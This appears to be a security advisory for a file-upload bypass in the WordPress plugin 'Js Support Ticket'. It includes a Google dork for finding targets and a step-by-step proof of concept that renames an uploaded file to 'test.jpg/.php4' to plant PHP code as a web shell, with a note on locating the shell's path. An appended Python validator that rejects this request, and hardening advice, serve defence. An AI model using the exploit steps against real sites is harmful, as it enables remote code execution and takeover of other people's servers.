#-Title: Wordpress "Js Support Ticket" File Upload Bypass Extensions
#-Author: Mgm-Eg
#-Contact : ask.fm/m1g1m
#-Date: 2015-12-05
#-Link Download : wordpress.org/plugins/js-support-ticket/
#-Google Dork: inurl:wp-content/plugins/js-support-ticket/
#-Tested on : Windows, Linux
#-Fixed in : ??
////////////////////////////////////////////////////////////////////////////////////////////
Description :
When you open a ticket, you can upload attachments only with these file extension types:
Doc, Docx, odt, pdf, txt, png, jpeg, jpg
But you can bypass this restriction and upload files with other extensions.
Solution:
Upgrade to the new version
-- Proof Of Concept --
1. Using Notepad++, open a new file and add:
[ GIF89a;
<?php phpinfo(); ?> #you can replace this code with your own code
]
2. Save the file as "test.jpg".
3. Open the ticket page, complete the required fields, and upload your [test.jpg].
Use Http Live Header, open the request, edit the file name from "test.jpg" to "test.jpg/.php4", and delete "GIF89a;".
example :
-----------------------------319722301512393\r\n
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"\r\n
Content-Type: image/jpeg\r\n
\r\n
\r\n
<?php phpinfo(); ?>\r\n
-----------------------------319722301512393\r\n
Shell Path :
*Note
Also check your email to find the path of your file, or open My Tickets to see all the tickets you have sent and find the file path there.
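
A server-side check that refuses the request shown above, as an added example (not code from the plugin or from the advisory author). The function name `reject_reasons`, the signature table and the benign sample part are assumptions made for illustration; the allow-list is the one given in the description.

```python
import re

# Extensions the advisory lists as accepted by the ticket form.
ALLOWED = {"doc", "docx", "odt", "pdf", "txt", "png", "jpeg", "jpg"}
# Leading bytes expected for the binary types in that list.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "pdf": b"%PDF-"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
FILENAME = re.compile(rb'filename="([^"]*)"', re.I)


def reject_reasons(part: bytes) -> list:
    """Return why one multipart/form-data file part should be refused ([] = accept)."""
    head, _, body = part.partition(b"\r\n\r\n")
    m = FILENAME.search(head)
    if not m:
        return ["no filename parameter"]
    name = m.group(1).decode("latin-1")
    reasons = []
    # Judge the name exactly as the client sent it, before any basename()
    # or normalisation step can hide a trailing path segment.
    if re.search(r"[/\\\x00]", name):
        reasons.append("path separator or NUL in filename")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        reasons.append("extension %r not in allow-list" % ext)
    elif ext in MAGIC and not body.startswith(MAGIC[ext]):
        reasons.append("content does not match .%s signature" % ext)
    if PHP_TAG.search(body):
        reasons.append("PHP open tag in body")
    return reasons


# The part shown in the advisory's request (boundary lines omitted).
POC_PART = (b'Content-Disposition: form-data; name="filename[]"; '
            b'filename="test.jpg/.php4"\r\nContent-Type: image/jpeg\r\n\r\n'
            b'\r\n<?php phpinfo(); ?>\r\n')
# Constructed benign part: a name on the allow-list with a PNG signature.
OK_PART = (b'Content-Disposition: form-data; name="filename[]"; '
           b'filename="screenshot.png"\r\nContent-Type: image/png\r\n\r\n'
           b'\x89PNG\r\n\x1a\n' + b'\x00' * 16)

if __name__ == "__main__":
    print(reject_reasons(POC_PART))
    print(reject_reasons(OK_PART))
```

Storing accepted files under a server-generated name, in a directory where the web server does not execute scripts, removes the dependence on the client-supplied name altogether.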